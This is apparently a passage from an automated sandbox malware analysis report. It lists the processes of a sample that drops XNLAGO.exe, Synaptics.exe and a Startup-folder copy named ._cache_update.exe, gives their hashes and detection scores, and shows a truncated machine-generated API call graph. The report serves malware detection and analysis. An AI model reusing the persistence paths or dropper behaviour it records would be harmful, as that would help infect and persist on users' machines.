                                                                                                                                                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2549958974.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:22
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 68%, ReversingLabs
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:27
                                                                                                                                                        Start time:06:56:46
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:28
                                                                                                                                                        Start time:06:56:54
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:771'584 bytes
                                                                                                                                                        MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:29
                                                                                                                                                        Start time:06:57:00
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:30
                                                                                                                                                        Start time:06:57:02
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:31
                                                                                                                                                        Start time:06:57:10
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                        Imagebase:0x120000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:34
                                                                                                                                                        Start time:06:57:19
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:37
                                                                                                                                                        Start time:06:57:37
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:38
                                                                                                                                                        Start time:06:58:00
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:9.7%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:43
                                                                                                                                                          execution_graph 86325 19c05b 86326 19c05d 86325->86326 86329 1678ee WSAStartup 86326->86329 86328 19c066 86330 167917 gethostname gethostbyname 86329->86330 86331 1679b1 _wcscpy 86329->86331 86330->86331 86332 16793a _memmove 86330->86332 86331->86328 86333 167970 inet_ntoa 86332->86333 86337 167952 _wcscpy 86332->86337 86335 167989 _strcat 86333->86335 86334 1679a9 WSACleanup 86334->86331 86338 168553 86335->86338 86337->86334 86339 168565 _strlen 86338->86339 86340 168561 86338->86340 86341 168574 MultiByteToWideChar 86339->86341 86340->86337 86341->86340 86342 16858a 86341->86342 86345 14010a 86342->86345 86344 1685a6 MultiByteToWideChar 86344->86340 86347 140112 __calloc_impl 86345->86347 86348 14012c 86347->86348 86349 14012e std::exception::exception 86347->86349 86354 1445ec 86347->86354 86348->86344 86368 147495 RaiseException 86349->86368 86351 140158 86369 1473cb 47 API calls _free 86351->86369 86353 14016a 86353->86344 86355 144667 __calloc_impl 86354->86355 86360 1445f8 __calloc_impl 86354->86360 86375 14889e 47 API calls __getptd_noexit 86355->86375 86358 14462b RtlAllocateHeap 86358->86360 86367 14465f 86358->86367 86360->86358 86361 144653 86360->86361 86364 144651 86360->86364 86365 144603 86360->86365 86373 14889e 47 API calls __getptd_noexit 86361->86373 86374 14889e 47 API calls __getptd_noexit 86364->86374 86365->86360 86370 148e52 47 API calls __NMSG_WRITE 86365->86370 86371 148eb2 47 API calls 7 library calls 86365->86371 86372 141d65 GetModuleHandleExW 6CA06DE0 ExitProcess ___crtCorExitProcess 86365->86372 86367->86347 86368->86351 86369->86353 86370->86365 86371->86365 86373->86364 86374->86367 86375->86367 86376 191edb 86381 12131c 86376->86381 86382 12133e 86381->86382 86415 121624 86382->86415 86389 12d3d2 48 API calls 86390 121388 86389->86390 86391 12d3d2 48 API calls 86390->86391 86392 121392 86391->86392 86393 12d3d2 48 API calls 86392->86393 86394 1213d8 86393->86394 86395 12d3d2 48 API calls 86394->86395 86396 1214bb 86395->86396 86428 121673 86396->86428 86466 1217e0 86415->86466 86419 121344 86420 1216db 86419->86420 86501 121867 6 API calls 86420->86501 86422 121374 86423 12d3d2 86422->86423 86424 14010a 48 API calls 86423->86424 86425 12d3f3 86424->86425 86426 14010a 48 API calls 86425->86426 86427 12137e 86426->86427 86427->86389 86429 12d3d2 48 API calls 86428->86429 86430 121683 86429->86430 86431 12d3d2 48 API calls 86430->86431 86432 12168b 86431->86432 86482 1217fc 86466->86482 86469 1217fc 48 API calls 86470 1217f0 86469->86470 86471 12d3d2 48 API calls 86470->86471 86472 12165b 86471->86472 86473 127e53 86472->86473 86474 127ecf 86473->86474 86476 127e5f __wsetenvp 86473->86476 86493 12a2fb 86474->86493 86477 127ec7 86476->86477 86478 127e7b 86476->86478 86492 127eda 48 API calls 86477->86492 86489 12a6f8 86478->86489 86481 127e85 _memmove 86481->86419 86483 12d3d2 48 API calls 86482->86483 86484 121807 86483->86484 86485 12d3d2 48 API calls 86484->86485 86486 12180f 86485->86486 86487 12d3d2 48 API calls 86486->86487 86488 1217e8 86487->86488 86488->86469 86490 14010a 48 API calls 86489->86490 86491 12a702 86490->86491 86491->86481 86492->86481 86494 12a309 86493->86494 86496 12a321 _memmove 86493->86496 86494->86496 86497 12b8a7 86494->86497 86496->86481 86498 12b8ba 86497->86498 86500 12b8b7 _memmove 86497->86500 86499 14010a 48 API calls 86498->86499 86499->86500 86500->86496 86501->86422 86509 130ff7 86975 13e016 86509->86975 86511 13100d 86984 13e08f 86511->86984 86515 14010a 48 API calls 86547 12fad8 Mailbox _memmove 86515->86547 86517 13105e 87015 12c935 86517->87015 86518 130dee 86997 12d89e 86518->86997 86520 131063 87022 16d520 85 API calls 4 library calls 86520->87022 86521 130dfa 86527 12d89e 50 API calls 86521->86527 86522 19b772 87024 16d520 85 API calls 4 library calls 86522->87024 86523 130119 87023 16d520 85 API calls 4 library calls 86523->87023 86529 130e83 86527->86529 86528 12c935 48 API calls 86528->86547 87007 12caee 86529->87007 86530 15a599 InterlockedDecrement 86530->86547 86531 12d3d2 48 API calls 86531->86547 86533 19b7d2 86534 141b2a 52 API calls __cinit 86534->86547 86536 12fbf1 Mailbox 86539 13103d 86539->86536 87021 16d520 85 API calls 4 library calls 86539->87021 86543 1310f1 Mailbox 87020 16d520 85 API calls 4 library calls 86543->87020 86545 19b583 87019 16d520 85 API calls 4 library calls 86545->87019 86547->86515 86547->86517 86547->86518 86547->86520 86547->86521 86547->86522 86547->86523 86547->86528 86547->86529 86547->86530 86547->86531 86547->86534 86547->86536 86547->86539 86547->86543 86547->86545 86566 12f6d0 86547->86566 86638 12fa40 86547->86638 86694 180bfa 86547->86694 86697 1817aa 86547->86697 86702 178065 GetCursorPos GetForegroundWindow 86547->86702 86716 179122 86547->86716 86730 13f461 86547->86730 86768 181f19 86547->86768 86771 18798d 86547->86771 86776 1830ad 86547->86776 86825 13dd84 86547->86825 86828 1810e5 86547->86828 86834 18804e 86547->86834 86848 1792c0 86547->86848 86866 13f03e 86547->86866 86869 17013f 86547->86869 86882 17b74b VariantInit 86547->86882 86923 13ef0d 86547->86923 86966 1250a3 86547->86966 86971 16be47 86547->86971 86996 131620 59 API calls Mailbox 86547->86996 87011 17ee52 81 API calls 2 library calls 86547->87011 87012 17ef9d 89 API calls Mailbox 86547->87012 87013 16b020 48 API calls 86547->87013 87014 17e713 401 API calls Mailbox 86547->87014 86567 12f708 86566->86567 86572 12f77b 86566->86572 86568 12f712 86567->86568 86569 19c4d5 86567->86569 86570 12f71c 86568->86570 86587 19c544 86568->86587 86574 19c4e2 86569->86574 86575 19c4f4 86569->86575 86580 19c6a4 86570->86580 86586 12f72a 86570->86586 86599 12f741 86570->86599 86571 12fa40 401 API calls 86591 12f787 86571->86591 86573 19c253 86572->86573 86572->86591 87064 16d520 85 API calls 4 library calls 86573->87064 87025 17f34f 86574->87025 87069 17c235 401 API calls Mailbox 86575->87069 86576 19c585 86589 19c590 86576->86589 86590 19c5a4 86576->86590 86583 12c935 48 API calls 86580->86583 86581 19c264 86581->86547 86582 19c507 86585 19c50b 86582->86585 86582->86599 86583->86599 87070 16d520 85 API calls 4 library calls 86585->87070 86586->86599 87170 15a599 InterlockedDecrement 86586->87170 86587->86576 86602 19c569 86587->86602 86588 12f770 Mailbox 86588->86547 86594 17f34f 401 API calls 86589->86594 87072 17d154 48 API calls 86590->87072 86591->86571 86591->86588 86592 12f8bb 86591->86592 86606 12f84a 86591->86606 86617 142241 48 API calls 86591->86617 86623 12f9d8 86591->86623 86592->86581 86596 19c45a 86592->86596 86592->86599 87066 15a599 InterlockedDecrement 86592->87066 87068 17f4df 401 API calls 86592->87068 86594->86599 86597 12c935 48 API calls 86596->86597 86597->86599 86599->86588 86600 19c7b5 86599->86600 87171 17ee52 81 API calls 2 library calls 86599->87171 86605 19c7eb 86600->86605 87192 17ef9d 89 API calls Mailbox 86600->87192 86601 19c5af 86614 19c62c 86601->86614 86615 19c5d1 86601->86615 87071 16d520 85 API calls 4 library calls 86602->87071 86607 12d89e 50 API calls 86605->86607 86611 19c32a 86606->86611 86620 12f854 86606->86620 86607->86588 86609 19c793 87172 1284a6 86609->87172 87065 12342c 48 API calls 86611->87065 87097 16afce 48 API calls 86614->87097 87073 16a485 48 API calls 86615->87073 86616 19c7c9 86618 1284a6 80 API calls 86616->86618 86617->86591 86626 19c7d1 __wsetenvp 86618->86626 87048 1314a0 86620->87048 86622 12f8ab 86622->86592 86622->86623 87067 16d520 85 API calls 4 library calls 86623->87067 86625 19c79b __wsetenvp 86625->86600 86629 12d89e 50 API calls 86625->86629 86626->86605 86631 12d89e 50 API calls 86626->86631 86627 19c63e 87098 13df08 48 API calls 86627->87098 86629->86600 86631->86605 86632 19c647 Mailbox 87099 16a485 48 API calls 86632->87099 86633 19c5f6 87074 1344e0 86633->87074 86636 19c663 87100 133680 86636->87100 86639 12fa60 86638->86639 86675 12fa8e Mailbox _memmove 86638->86675 86640 14010a 48 API calls 86639->86640 86640->86675 86641 141b2a 52 API calls __cinit 86641->86675 86642 131063 88050 16d520 85 API calls 4 library calls 86642->88050 86643 13105e 86644 12c935 48 API calls 86643->86644 86667 12fbf1 Mailbox 86644->86667 86645 12d3d2 48 API calls 86645->86675 86646 130119 88051 16d520 85 API calls 4 library calls 86646->88051 86649 130dee 86654 12d89e 50 API calls 86649->86654 86650 12c935 48 API calls 86650->86675 86652 130dfa 86656 12d89e 50 API calls 86652->86656 86653 19b772 88052 16d520 85 API calls 4 library calls 86653->88052 86654->86652 86659 130e83 86656->86659 86657 12f6d0 401 API calls 86657->86675 86658 15a599 InterlockedDecrement 86658->86675 86662 12caee 48 API calls 86659->86662 86661 19b7d2 86671 1310f1 Mailbox 86662->86671 86664 131230 86664->86667 88049 16d520 85 API calls 4 library calls 86664->88049 86667->86547 86668 14010a 48 API calls 86668->86675 86669 12fa40 401 API calls 86669->86675 88048 16d520 85 API calls 4 library calls 86671->88048 86673 19b583 88047 16d520 85 API calls 4 library calls 86673->88047 86675->86641 86675->86642 86675->86643 86675->86645 86675->86646 86675->86649 86675->86650 86675->86652 86675->86653 86675->86657 86675->86658 86675->86659 86675->86664 86675->86667 86675->86668 86675->86669 86675->86671 86675->86673 86676 181f19 129 API calls 86675->86676 86677 180bfa 128 API calls 86675->86677 86678 17013f 86 API calls 86675->86678 86679 13f03e 2 API calls 86675->86679 86680 16be47 50 API calls 86675->86680 86681 1250a3 49 API calls 86675->86681 86682 1817aa 86 API calls 86675->86682 86683 178065 55 API calls 86675->86683 86684 13f461 97 API calls 86675->86684 86685 179122 90 API calls 86675->86685 86686 1830ad 89 API calls 86675->86686 86687 18798d 108 API calls 86675->86687 86688 18804e 112 API calls 86675->86688 86689 13dd84 3 API calls 86675->86689 86690 1792c0 87 API calls 86675->86690 86691 17b74b 401 API calls 86675->86691 86692 1810e5 81 API calls 86675->86692 86693 13ef0d 93 API calls 86675->86693 88042 131620 59 API calls Mailbox 86675->88042 88043 17ee52 81 API calls 2 library calls 86675->88043 88044 17ef9d 89 API calls Mailbox 86675->88044 88045 16b020 48 API calls 86675->88045 88046 17e713 401 API calls Mailbox 86675->88046 86676->86675 86677->86675 86678->86675 86679->86675 86680->86675 86681->86675 86682->86675 86683->86675 86684->86675 86685->86675 86686->86675 86687->86675 86688->86675 86689->86675 86690->86675 86691->86675 86692->86675 86693->86675 88053 17f79f 86694->88053 86696 180c0a 86696->86547 86698 1284a6 80 API calls 86697->86698 86699 1817c7 86698->86699 86700 166f5b 63 API calls 86699->86700 86701 1817d8 86700->86701 86701->86547 88141 176b19 86702->88141 86705 1780a5 86706 123320 48 API calls 86705->86706 86707 1780b3 86706->86707 88146 132320 50 API calls 86707->88146 86708 178102 86710 12cdb4 48 API calls 86708->86710 86715 1780f5 86708->86715 86712 17812b 86710->86712 86711 1780cf 88147 132320 50 API calls 86711->88147 86714 12cdb4 48 API calls 86712->86714 86712->86715 86714->86715 86715->86547 86717 1284a6 80 API calls 86716->86717 86718 17913f 86717->86718 86719 12cdb4 48 API calls 86718->86719 86720 179149 86719->86720 88148 17acd3 86720->88148 86722 179156 86723 17915a socket 86722->86723 86727 179182 86722->86727 86724 179184 connect 86723->86724 86725 17916d WSAGetLastError 86723->86725 86726 1791a3 WSAGetLastError 86724->86726 86724->86727 86725->86727 88154 16d7e4 86726->88154 86727->86547 86729 1791b8 closesocket 86729->86727 86731 13f47f 86730->86731 86732 13f48a 86730->86732 86733 12cdb4 48 API calls 86731->86733 86736 1284a6 80 API calls 86732->86736 86765 13f498 Mailbox 86732->86765 86733->86732 86734 14010a 48 API calls 86735 13f49f 86734->86735 86738 13f4af 86735->86738 88169 125080 49 API calls 86735->88169 86737 196841 86736->86737 86739 14297d __wsplitpath 47 API calls 86737->86739 86742 1284a6 80 API calls 86738->86742 86741 196859 86739->86741 86743 12caee 48 API calls 86741->86743 86744 13f4bf 86742->86744 86745 19686a 86743->86745 86746 124bf9 56 API calls 86744->86746 88176 1239e8 48 API calls 2 library calls 86745->88176 86747 13f4ce 86746->86747 86749 1968d4 GetLastError 86747->86749 86759 13f4d6 86747->86759 86751 1968ed 86749->86751 86750 196878 86766 196895 86750->86766 88177 166f4b GetFileAttributesW FindFirstFileW FindClose 86750->88177 86751->86759 88178 124592 CloseHandle 86751->88178 86752 12cdb4 48 API calls 86752->86765 86753 13f4f0 86756 14010a 48 API calls 86753->86756 86754 196920 86757 14010a 48 API calls 86754->86757 86760 13f4f5 86756->86760 86761 196925 86757->86761 86758 196888 86764 166d6d 52 API calls 86758->86764 86758->86766 86759->86753 86759->86754 88170 12197e 86760->88170 86764->86766 86765->86734 86767 13f50a Mailbox 86765->86767 86766->86752 86767->86547 88179 1823c5 86768->88179 88263 1219ee 86771->88263 86775 1879a4 86775->86547 86777 12ca8e 48 API calls 86776->86777 86778 1830ca 86777->86778 86779 12d3d2 48 API calls 86778->86779 86780 1830d3 86779->86780 86781 12d3d2 48 API calls 86780->86781 86782 1830dc 86781->86782 86783 12d3d2 48 API calls 86782->86783 86784 1830e5 86783->86784 86785 1284a6 80 API calls 86784->86785 86786 1830f4 86785->86786 86787 183d7b 48 API calls 86786->86787 86788 183128 86787->86788 86789 183af7 49 API calls 86788->86789 86790 183159 86789->86790 86791 18319c RegOpenKeyExW 86790->86791 86792 183172 RegConnectRegistryW 86790->86792 86800 18315d Mailbox 86790->86800 86794 1831f7 86791->86794 86791->86800 86792->86791 86792->86800 86795 1284a6 80 API calls 86794->86795 86796 183207 RegQueryValueExW 86795->86796 86797 18323e 86796->86797 86796->86800 86798 18344c 86797->86798 86799 183265 86797->86799 86797->86800 86803 14010a 48 API calls 86798->86803 86801 1833d9 86799->86801 86802 18326e 86799->86802 86800->86547 88381 16ad14 48 API calls _memset 86801->88381 86805 183279 86802->86805 86806 18338d 86802->86806 86807 183464 86803->86807 86809 1832de 86805->86809 86810 18327e 86805->86810 86811 1284a6 80 API calls 86806->86811 86812 1284a6 80 API calls 86807->86812 86808 1833e4 86813 1284a6 80 API calls 86808->86813 86815 14010a 48 API calls 86809->86815 86810->86800 86818 1284a6 80 API calls 86810->86818 86814 1833a1 RegQueryValueExW 86811->86814 86816 183479 RegQueryValueExW 86812->86816 86817 1833f6 RegQueryValueExW 86813->86817 86814->86800 86819 1832f7 86815->86819 86816->86800 86824 183331 86816->86824 86817->86800 86820 18329f RegQueryValueExW 86818->86820 86821 1284a6 80 API calls 86819->86821 86820->86800 86822 18330c RegQueryValueExW 86821->86822 86822->86800 86822->86824 86823 12ca8e 48 API calls 86823->86800 86824->86823 88382 13dd92 GetFileAttributesW 86825->88382 86829 1284a6 80 API calls 86828->86829 86830 1810fb LoadLibraryW 86829->86830 86831 18111e 86830->86831 86833 18110f 86830->86833 86831->86833 88387 1828d9 48 API calls _memmove 86831->88387 86833->86547 86835 1219ee 82 API calls 86834->86835 86836 188062 86835->86836 86837 121dce 106 API calls 86836->86837 86838 18806b 86837->86838 86839 18806f 86838->86839 86840 188091 86838->86840 86842 12ca8e 48 API calls 86839->86842 86841 12d3d2 48 API calls 86840->86841 86843 18809a 86841->86843 86847 18808f Mailbox 86842->86847 88388 15e2e8 86843->88388 86845 1880aa 88405 127bef 86845->88405 86847->86547 86849 12a6d4 48 API calls 86848->86849 86850 1792d2 86849->86850 86851 1284a6 80 API calls 86850->86851 86852 1792e1 86851->86852 86853 13f26b 50 API calls 86852->86853 86854 1792ed gethostbyname 86853->86854 86855 1792fa WSAGetLastError 86854->86855 86857 17931d _memmove 86854->86857 86856 17930e 86855->86856 86860 12ca8e 48 API calls 86856->86860 86858 17932d inet_ntoa 86857->86858 88438 17adca 48 API calls 2 library calls 86858->88438 86865 17931b Mailbox 86860->86865 86861 179342 88439 17ae5a 50 API calls 86861->88439 86863 17934e 86864 127bef 48 API calls 86863->86864 86864->86865 86865->86547 86867 13f0b5 2 API calls 86866->86867 86868 13f046 86867->86868 86868->86547 86870 170157 86869->86870 86871 17015e 86869->86871 86873 1284a6 80 API calls 86870->86873 86872 1284a6 80 API calls 86871->86872 86872->86870 86874 17017c 86873->86874 88440 1676db GetFileVersionInfoSizeW 86874->88440 86876 17018d 86877 170192 86876->86877 86879 1701a3 _wcscmp 86876->86879 86878 12ca8e 48 API calls 86877->86878 86881 1701a1 86878->86881 86880 12ca8e 48 API calls 86879->86880 86880->86881 86881->86547 86883 12ca8e 48 API calls 86882->86883 86884 17b7a3 CoInitialize 86883->86884 86885 17b7ae CoUninitialize 86884->86885 86887 17b7b4 86884->86887 86885->86887 86886 17b7d5 86889 17b81b 86886->86889 86890 1284a6 80 API calls 86886->86890 86887->86886 86888 12ca8e 48 API calls 86887->86888 86888->86886 86891 1284a6 80 API calls 86889->86891 86892 17b7ef 86890->86892 86894 17b827 86891->86894 88456 15a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 86892->88456 86896 17b9d3 SetErrorMode CoGetInstanceFromFile 86894->86896 86907 17b861 86894->86907 86895 17b802 86895->86889 86897 17b807 86895->86897 86899 17ba1f CoGetObject 86896->86899 86900 17ba19 SetErrorMode 86896->86900 88457 17c235 401 API calls Mailbox 86897->88457 86898 17b8a8 GetRunningObjectTable 86904 17b8cb 86898->86904 86905 17b8b8 86898->86905 86899->86900 86903 17baa8 86899->86903 86920 17b9b1 86900->86920 88462 17c235 401 API calls Mailbox 86903->88462 88458 17c235 401 API calls Mailbox 86904->88458 86905->86904 86922 17b8ed 86905->86922 86907->86898 86911 17b89a 86907->86911 86914 12cdb4 48 API calls 86907->86914 86909 17bad0 VariantClear 86909->86547 86910 17b814 Mailbox 86910->86909 86911->86898 86912 17bac2 SetErrorMode 86912->86910 86913 17ba53 86915 17ba6f 86913->86915 88460 15ac4b 51 API calls Mailbox 86913->88460 86917 17b88a 86914->86917 88461 16a6f6 102 API calls 86915->88461 86917->86911 86919 12cdb4 48 API calls 86917->86919 86919->86911 86920->86903 86920->86913 86922->86920 88459 15ac4b 51 API calls Mailbox 86922->88459 86924 12ca8e 48 API calls 86923->86924 86925 13ef25 86924->86925 86926 13effb 86925->86926 86927 13ef3e 86925->86927 86929 14010a 48 API calls 86926->86929 88486 13f0f3 48 API calls 86927->88486 86930 13f002 86929->86930 86931 13f00e 86930->86931 88488 125080 49 API calls 86930->88488 86933 1284a6 80 API calls 86931->86933 86937 13f01c 86933->86937 86934 13ef73 86938 13f03e 2 API calls 86934->86938 86935 13ef4d 86935->86934 86936 12cdb4 48 API calls 86935->86936 86939 196942 86935->86939 86940 196965 86936->86940 86941 124bf9 56 API calls 86937->86941 86942 13ef7a 86938->86942 86939->86547 86940->86934 86943 19696d 86940->86943 86944 13f02b 86941->86944 86945 13ef87 86942->86945 86946 196980 86942->86946 86947 12cdb4 48 API calls 86943->86947 86944->86935 86948 196936 86944->86948 86950 12d3d2 48 API calls 86945->86950 86949 14010a 48 API calls 86946->86949 86947->86942 86948->86939 88489 124592 CloseHandle 86948->88489 86951 196986 86949->86951 86952 13ef8f 86950->86952 86953 19699f 86951->86953 88490 123d65 ReadFile SetFilePointerEx 86951->88490 88463 13f04e 86952->88463 86960 1969a3 _memmove 86953->86960 88491 16ad14 48 API calls _memset 86953->88491 86958 13ef9e 86959 127bef 48 API calls 86958->86959 86958->86960 86961 13efb2 Mailbox 86959->86961 86962 13eff2 86961->86962 86963 1250ec CloseHandle 86961->86963 86962->86547 86964 13efe4 86963->86964 88487 124592 CloseHandle 86964->88487 86967 14010a 48 API calls 86966->86967 86968 1250b3 86967->86968 86969 1250ec CloseHandle 86968->86969 86970 1250be 86969->86970 86970->86547 86972 16be55 86971->86972 86973 16be50 86971->86973 86972->86547 88515 16ae06 86973->88515 86976 13e022 86975->86976 86977 13e034 86975->86977 86980 12d89e 50 API calls 86976->86980 86978 13e063 86977->86978 86979 13e03a 86977->86979 86982 12d89e 50 API calls 86978->86982 86981 14010a 48 API calls 86979->86981 86983 13e02c 86980->86983 86981->86983 86982->86983 86983->86511 88536 127b6e 48 API calls 86984->88536 86986 13e0b4 _wcscmp 86987 12caee 48 API calls 86986->86987 86989 13e0e2 Mailbox 86986->86989 86988 19b9c7 86987->86988 88537 127b4b 48 API calls Mailbox 86988->88537 86989->86547 86991 19b9d5 86992 12d2d2 53 API calls 86991->86992 86993 19b9e7 86992->86993 86994 12d89e 50 API calls 86993->86994 86995 19b9ec Mailbox 86993->86995 86994->86995 86995->86547 86996->86547 86998 12d8ac 86997->86998 87005 12d8db Mailbox 86997->87005 86999 12d8ff 86998->86999 87001 12d8b2 Mailbox 86998->87001 87000 12c935 48 API calls 86999->87000 87000->87005 87002 12d8c7 87001->87002 87003 194e9b 87001->87003 87004 194e72 VariantClear 87002->87004 87002->87005 87003->87005 88538 15a599 InterlockedDecrement 87003->88538 87004->87005 87005->86521 87008 12cafd __wsetenvp _memmove 87007->87008 87009 14010a 48 API calls 87008->87009 87010 12cb3b 87009->87010 87010->86543 87011->86547 87012->86547 87013->86547 87014->86547 87016 12c940 87015->87016 87017 12c948 87015->87017 87018 12d805 48 API calls 87016->87018 87017->86536 87018->87017 87019->86543 87020->86536 87021->86520 87022->86523 87023->86522 87024->86533 87026 12d3d2 48 API calls 87025->87026 87028 17f389 Mailbox 87026->87028 87027 17f3a9 87029 12d89e 50 API calls 87027->87029 87028->87027 87030 17f3e1 87028->87030 87031 17f3cd 87028->87031 87045 17f421 Mailbox 87029->87045 87033 12c935 48 API calls 87030->87033 87032 127e53 48 API calls 87031->87032 87034 17f3df 87032->87034 87033->87034 87035 17f429 87034->87035 87199 17cdb5 401 API calls 87034->87199 87193 17cd12 87035->87193 87038 17f410 87038->87035 87040 17f414 87038->87040 87039 17f44b 87042 17f457 87039->87042 87043 17f4a2 87039->87043 87200 16d338 85 API calls 4 library calls 87040->87200 87042->87027 87046 17f476 87042->87046 87044 17f34f 401 API calls 87043->87044 87044->87045 87045->86599 87201 12ca8e 87046->87201 87049 131606 87048->87049 87052 1314b2 87048->87052 87049->86622 87050 1314be 87055 1314c9 87050->87055 87284 12346e 48 API calls 87050->87284 87052->87050 87053 14010a 48 API calls 87052->87053 87054 195299 87053->87054 87057 14010a 48 API calls 87054->87057 87056 13156d 87055->87056 87058 14010a 48 API calls 87055->87058 87056->86622 87063 1952a4 87057->87063 87059 1315af 87058->87059 87060 1315c2 87059->87060 87283 13d6b4 48 API calls 87059->87283 87060->86622 87062 14010a 48 API calls 87062->87063 87063->87050 87063->87062 87064->86581 87065->86592 87066->86592 87067->86588 87068->86592 87069->86582 87070->86588 87071->86588 87072->86601 87073->86633 87075 134537 87074->87075 87076 13469f 87074->87076 87078 134543 87075->87078 87079 